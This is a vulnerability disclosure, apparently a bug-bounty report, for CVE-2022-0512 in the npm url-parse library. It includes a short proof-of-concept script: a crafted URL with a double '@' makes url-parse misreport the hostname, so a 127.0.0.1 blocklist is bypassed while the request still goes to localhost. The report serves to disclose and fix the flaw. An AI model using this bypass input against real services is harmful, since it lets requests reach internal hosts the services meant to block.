Headline
CVE-2022-0512: Authorization Bypass Through User-Controlled Key in url-parse
Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.
Description
Improperly handeling username and password . And unable to detect the hostname .
Proof of Concept
url-parse not able verify basic authentication credential and also wrongly verifying hostname .This allow to bypass hostname validation .
Lets username is admin and password is password123@ and hostname is 127.0.0.1 .
so the url will be http://admin:password123@@127.0.0.1 .
And there is blacklist check for domain 127.0.0.1 and every request to 127.0.0.1 will be blocked .\
Now lets use url-parse
// PoC.js
var parse = require('url-parse')
var cc=parse("http://admin:password123@@127.0.0.1")
result
{ slashes: true,
protocol: 'http:',
hash: '',
query: '',
pathname: '/',
auth: 'admin:password123',
host: '@127.0.0.1',
port: '',
hostname: '@127.0.0.1',
password: 'password123',
username: 'admin',
origin: 'http://@127.0.0.1',
href: 'http://admin:password123@@127.0.0.1/' }
Here see its incorrretly detecting auth ,origin,password and hostname .
Here hostname check cc.hostname is @127.0.0.1 and also cc.origin is http://@127.0.0.1 which will clearly bypass above 127.0.0.1 blacklist check .
Now if you use cc.href to fetch url then it will fetch 127.0.0.1 .
Impact
Bypass hostname check
Occurrences